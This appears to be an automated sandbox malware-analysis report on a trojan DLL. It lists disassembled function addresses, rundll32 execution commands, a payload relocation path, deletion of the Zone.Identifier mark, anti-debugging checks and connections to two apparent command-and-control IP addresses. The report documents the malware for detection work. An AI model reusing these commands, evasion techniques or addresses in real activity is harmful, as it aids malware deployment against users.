Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04079886	6_2_04079886
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407848F	6_2_0407848F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04082081	6_2_04082081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407708B	6_2_0407708B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406BA95	6_2_0406BA95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04066693	6_2_04066693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406E09E	6_2_0406E09E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04075CA0	6_2_04075CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040774A8	6_2_040774A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040684B5	6_2_040684B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407FABB	6_2_0407FABB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406E6C7	6_2_0406E6C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406E2D7	6_2_0406E2D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407CED5	6_2_0407CED5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406CAD5	6_2_0406CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406C8D3	6_2_0406C8D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407B0DD	6_2_0407B0DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407FCD8	6_2_0407FCD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407D2E6	6_2_0407D2E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406C0E4	6_2_0406C0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04077AF5	6_2_04077AF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04074CF5	6_2_04074CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040824FA	6_2_040824FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040738F0	6_2_040738F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406DD02	6_2_0406DD02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406F71C	6_2_0406F71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04070F1B	6_2_04070F1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407AD26	6_2_0407AD26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04062735	6_2_04062735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04064D32	6_2_04064D32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407D530	6_2_0407D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407313F	6_2_0407313F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407F93D	6_2_0407F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406193C	6_2_0406193C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406ED39	6_2_0406ED39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406CF39	6_2_0406CF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406A34E	6_2_0406A34E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04076349	6_2_04076349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04066B58	6_2_04066B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04078563	6_2_04078563
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407EF6D	6_2_0407EF6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407BD6A	6_2_0407BD6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406F574	6_2_0406F574
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04065973	6_2_04065973
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04071F7B	6_2_04071F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04068784	6_2_04068784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04078389	6_2_04078389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04078996	6_2_04078996
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407D99C	6_2_0407D99C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04081B95	6_2_04081B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040665A1	6_2_040665A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040793A0	6_2_040793A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407E5A8	6_2_0407E5A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040675A9	6_2_040675A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04071BB7	6_2_04071BB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04061DB2	6_2_04061DB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407B3B8	6_2_0407B3B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040713D7	6_2_040713D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040699D7	6_2_040699D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407DDD1	6_2_0407DDD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040709F3	6_2_040709F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406AFF0	6_2_0406AFF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04076DF8	6_2_04076DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04185406	8_2_04185406
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417CE30	8_2_0417CE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418EC2D	8_2_0418EC2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417825D	8_2_0417825D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04192A78	8_2_04192A78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417BA95	8_2_0417BA95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04173894	8_2_04173894
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04189886	8_2_04189886
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418FABB	8_2_0418FABB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041874A8	8_2_041874A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418FCD8	8_2_0418FCD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417CAD5	8_2_0417CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041838F0	8_2_041838F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04180F1B	8_2_04180F1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04172735	8_2_04172735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418F93D	8_2_0418F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04174D32	8_2_04174D32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418313F	8_2_0418313F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417CF39	8_2_0417CF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04176B58	8_2_04176B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417F574	8_2_0417F574
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418D99C	8_2_0418D99C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04178784	8_2_04178784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418E5A8	8_2_0418E5A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041893A0	8_2_041893A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418DDD1	8_2_0418DDD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041809F3	8_2_041809F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418261D	8_2_0418261D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04174410	8_2_04174410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04177C10	8_2_04177C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04180610	8_2_04180610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418A614	8_2_0418A614
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417D407	8_2_0417D407
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417480A	8_2_0417480A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04187C07	8_2_04187C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418F43B	8_2_0418F43B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417FA3C	8_2_0417FA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04177A51	8_2_04177A51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418A049	8_2_0418A049
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418E84B	8_2_0418E84B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418584C	8_2_0418584C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04184A72	8_2_04184A72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417F07C	8_2_0417F07C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04175E78	8_2_04175E78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417606B	8_2_0417606B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417226A	8_2_0417226A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04176693	8_2_04176693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417E09E	8_2_0417E09E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418708B	8_2_0418708B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418848F	8_2_0418848F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04192081	8_2_04192081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041784B5	8_2_041784B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04185CA0	8_2_04185CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417E2D7	8_2_0417E2D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417C8D3	8_2_0417C8D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418B0DD	8_2_0418B0DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418CED5	8_2_0418CED5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417E6C7	8_2_0417E6C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041924FA	8_2_041924FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04187AF5	8_2_04187AF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04184CF5	8_2_04184CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417C0E4	8_2_0417C0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418D2E6	8_2_0418D2E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417F71C	8_2_0417F71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417DD02	8_2_0417DD02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418D530	8_2_0418D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417193C	8_2_0417193C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417ED39	8_2_0417ED39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418AD26	8_2_0418AD26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04186349	8_2_04186349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417A34E	8_2_0417A34E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04181F7B	8_2_04181F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04175973	8_2_04175973
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418BD6A	8_2_0418BD6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418EF6D	8_2_0418EF6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04188563	8_2_04188563
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04191B95	8_2_04191B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04188996	8_2_04188996
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04188389	8_2_04188389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418B3B8	8_2_0418B3B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04171DB2	8_2_04171DB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04181BB7	8_2_04181BB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041765A1	8_2_041765A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041775A9	8_2_041775A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041799D7	8_2_041799D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041813D7	8_2_041813D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04186DF8	8_2_04186DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417AFF0	8_2_0417AFF0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10013B28 appears 54 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10013978 appears 91 times

Source: NjTYb3VyzV.dll

Binary or memory string: OriginalFilenameFTPTREE.EXEH vs NjTYb3VyzV.dll

Source: NjTYb3VyzV.dll	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: NjTYb3VyzV.dll	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: NjTYb3VyzV.dll	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: NjTYb3VyzV.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: NjTYb3VyzV.dll

Virustotal: Detection: 13%

Source: NjTYb3VyzV.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NjTYb3VyzV.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu",ZUcsEM
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NjTYb3VyzV.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu",ZUcsEM	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xzrjbnqqcb\ruunnfqf.mlu",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@18/7@0/29

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10005E84 FormatMessageA,FormatMessageA,FormatMessageA,LocalFree,InternetGetLastResponseInfoA,InternetGetLastResponseInfoA,GetLastError,LocalAlloc,InternetGetLastResponseInfoA,LocalFree,LocalFree,FreeLibrary,

2_2_10005E84

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_0417D29B CreateToolhelp32Snapshot,

8_2_0417D29B

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\NjTYb3VyzV.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10001000 LoadResource,

2_2_10001000

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: NjTYb3VyzV.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NjTYb3VyzV.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NjTYb3VyzV.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NjTYb3VyzV.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NjTYb3VyzV.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10013A50 push ecx; ret	2_2_10013A63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10013B6D push ecx; ret	2_2_10013B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047210BA push eax; ret	2_2_0472118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04721160 push eax; ret	2_2_0472118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472124E pushfd ; ret	2_2_04721258
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462124E pushfd ; ret	3_2_04621258
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046210BA push eax; ret	3_2_0462118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04621160 push eax; ret	3_2_0462118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406124E pushfd ; ret	6_2_04061258
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_040610BA push eax; ret	6_2_0406118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04061160 push eax; ret	6_2_0406118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0417124E pushfd ; ret	8_2_04171258
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_041710BA push eax; ret	8_2_0417118C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04171160 push eax; ret	8_2_0417118C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_1002127E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_1002127E

Source: NjTYb3VyzV.dll

Static PE information: real checksum: 0x6d835 should be: 0x6f415

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000712B IsIconic,GetWindowPlacement,GetWindowRect,		2_2_1000712B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10003578 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		2_2_10003578

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 1908	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4792	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4624	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100062E3 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__EH_prolog3,lstrlenA,FtpFindFirstFileA,	2_2_100062E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10004E7C FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	2_2_10004E7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418B2CC FindFirstFileW,	8_2_0418B2CC

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000011.00000002.483249319.00000125DA4E1000.00000004.00000001.sdmp	Binary or memory string: &@Hyper-V RAW
Source: svchost.exe, 00000015.00000002.862144227.00000197B5861000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000011.00000002.482442900.00000125DA471000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.483338719.00000125DA4EB000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.862133126.00000197B5854000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.861778615.00000197B002A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_100127FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_100127FF

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_1002127E

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473DDCA mov eax, dword ptr fs:[00000030h]	2_2_0473DDCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463DDCA mov eax, dword ptr fs:[00000030h]	3_2_0463DDCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407DDCA mov eax, dword ptr fs:[00000030h]	6_2_0407DDCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0418DDCA mov eax, dword ptr fs:[00000030h]	8_2_0418DDCA

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001E36A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_1001E36A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100127FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_100127FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10017834 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10017834

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 41.76.108.46 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 91.200.186.228 187			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\NjTYb3VyzV.dll",#1

Jump to behavior

Source: rundll32.exe, 00000008.00000002.868029953.0000000002BA0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000008.00000002.868029953.0000000002BA0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000008.00000002.868029953.0000000002BA0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000008.00000002.868029953.0000000002BA0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
